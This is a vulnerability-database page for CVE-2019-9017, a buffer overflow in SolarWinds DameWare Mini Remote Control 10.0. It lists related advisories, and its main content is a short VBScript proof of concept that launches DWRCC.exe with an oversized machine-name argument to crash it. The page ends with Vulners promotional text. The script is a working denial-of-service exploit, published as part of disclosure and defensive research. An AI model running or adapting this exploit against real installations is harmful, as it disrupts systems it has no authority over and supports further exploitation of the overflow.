| Reporter | Title | Published | Views | Family All 9 |
|---|---|---|---|---|
| SolarWinds DameWare Mini Remote Control 10.0 - Denial of Service Exploit | 3 May 201900:00 | – | zdt | |
| CVE-2019-9017 | 14 Nov 202406:07 | – | circl | |
| CVE-2019-9017 | 2 May 201918:54 | – | cve | |
| CVE-2019-9017 | 2 May 201918:54 | – | cvelist | |
| SolarWinds DameWare Mini Remote Control 10.0 - Denial of Service | 3 May 201900:00 | – | exploitpack | |
| CVE-2019-9017 | 2 May 201919:29 | – | nvd | |
| SolarWinds DameWare Mini Remote Control 10.0 Denial Of Service | 3 May 201900:00 | – | packetstorm | |
| Buffer overflow | 2 May 201919:29 | – | prion | |
| PT-2019-19312 · Solarwinds · Solarwinds Dameware Mini Remote Control | 2 May 201900:00 | – | ptsecurity |
#Vendor: Solarwinds
#Site Vendor: https://www.dameware.com/
#Product: Dameware Mini Remote Control
#Version: 10.0 x64
#Platform: Windows
#Tested on: Windows 7 SP1 x64
#Dscription: The DWRCC executable file is affected by a buffer overflow vulnerability.
#The buffer size passed in on the machine name parameter is not checked
#Vector: pass buffer to the machine host name parameter
#Author: Dino Barlattani [email protected]
#Link: http://www.binaryworld.it
#CVE ID: CVE-2019-9017
#POC in VB Script
option explicit
dim fold,exe,buf,i,wsh,fso,result
exe = "DWRCC.exe"
fold = "C:\program files\SolarWinds\DameWare Mini Remote Control 10.0 x64
#1\"
for i = 0 to 300
buf = buf & "A"
next
set wsh = createobject("wscript.shell")
set fso = createobject("scripting.filesystemobject")
if fso.folderexists(fold) then
fold = fold & exe
fold = chr(34) & fold & chr(34)
result = wsh.run(fold & " -c: -h: -m:" & buf,0,true)
end ifData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation